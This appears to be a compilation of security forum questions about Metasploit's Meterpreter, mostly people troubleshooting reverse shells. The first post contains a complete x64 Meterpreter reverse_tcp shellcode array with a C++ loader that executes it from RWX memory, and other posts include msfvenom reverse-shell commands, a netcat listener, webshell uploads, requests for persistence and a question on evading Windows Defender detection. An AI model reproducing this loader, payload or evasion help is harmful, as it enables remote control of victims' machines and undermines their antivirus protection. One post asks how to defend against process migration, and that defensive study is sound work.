Can’t inject meterpreter shellcode in c++ code

I want to inject meterpreter shellcode in a c++ program .

When i create .exe file in msfvenom i try it in my virtual machine (windows 7) and it works well but when i create shellcode and inject it in a c++ file the programe compile succesfully but crashes when i launche it in my VM

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c -o main2.txt 

here i my c++ code (compiled in x64 debug mode with microsoft visual studio):

#include <iostream> #include <Windows.h> int main() { char shell[] =      "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"     "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"     "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"     "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"     "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"     "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"     "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"     "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"     "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"     "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"     "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"     "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"     "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"     "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"     "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"     "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"     "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\xd0\x85\x41\x54\x49\x89\xe4"     "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"     "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"     "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"     "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"     "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"     "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"     "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"     "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"     "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"     "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"     "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"     "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"     "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"     "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"     "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"     "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"     "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";  void* exec = VirtualAlloc(0, sizeof shell, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shell, sizeof shell); ((void(*)())exec)();  return 0;  } 

here is the error:

the application was unable du start correctly : c000007b 

What is my mistake ? thanks for answers !

MSF Venom Reverse TCP-Shell: Meterpreter and Netcat Listeners not responsive

I have created a MSFVenom TCP Reverse Shell Paypload that is executed on a Windows Machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4443 -f exe -o shell.exe 

In addition I am running a listener with Metasploit’s "multi/handler" or alternatively, a netcat listener:

nc -lvp 4443 

However, after executing the payload on the target machine, I cannot get a working shell. Neither on Meterpreter nor Netcat.


Meterpreter does not respond to any command, or backgrounding. I cannot get the normal Meterpreter Shell.

Netcat Listener

There is also no shell appearing on Netcat.

Any help or suggestions are very appreciated!

UFW does not block meterpreter

I am doing some pen testing on my wordpress server. I wanted to see what would happen if the attacker were to get a hold of my username and password for wordpress.

So I used the standard exploit in msfconsole wp_admin_shell_upload and set password and username.

What I do not understand is why my UFW does not block the established connection. ( My rules are set to block everything apart from port: 21,80 & 22)

But I can see a connection established on port 48846. Why is this not blocked and why am I able to send commands to remote machine via meterpreter and receive data?

Screenshots below:

Client: Client

Attacker: Attacker

Meterpreter Session died [Bwapp]

I just set up a lab with bwapp and wanted to jump straight into webshell. I used Unrestricted file upload vuln –> uploaded my perfect shell created with msfvenom.

My only problem is that my session doesn’t seem persistent as I’m getting Meterpreter session opened and then died.

For more context, bwapp is on a bridged network vbox and my kali is also bridged.

php/meterpreter_reverse_tcp etc etc.

Any ideas…

I need persistence (RCE)

What allows meterpreter to migrate processes and how to defend against it?

I mainly use Linux so I’m not well-versed on how Windows and its privileges work. I’ve recently learned to use Metasploit and meterpreter on Windows boxes.

Previous research

This answer has given an overview of how meterpreter migrates on Windows.
This article has addressed process migration on Linux

My questions

  1. What allows process migration to work?
  2. What are the main differences between Windows and Linux in process migration?
  3. Is this migration a feature or a vulnerability?
  4. How can I defend it?
  5. Should I try to prevent process migration?

FUD payload connection over 443 (meterpreter behavior) still being detected by Windows Defender

I’ve managed to create a obfuscated shellcode that is compatible with windows/meterpreter/reverse_tcp and windows/shell/reverse_tcp (metasploit) payload’s handlers. When testing with metasploit listening with windows/shell/reverse_tcp payload the connection is not detected, when I test with metasploit listening with windows/meterpreter/reverse_tcp set the behavior is detected. The detection seems to post connection..

Is there additional options/variables I can set in the windows/meterpreter/reverse_tcp payload handler to evade antivirus (windows defender) detecting meterpreter behavior?

I’m looking to evade detection server side (metasploit listener options), not client side I’ve done that.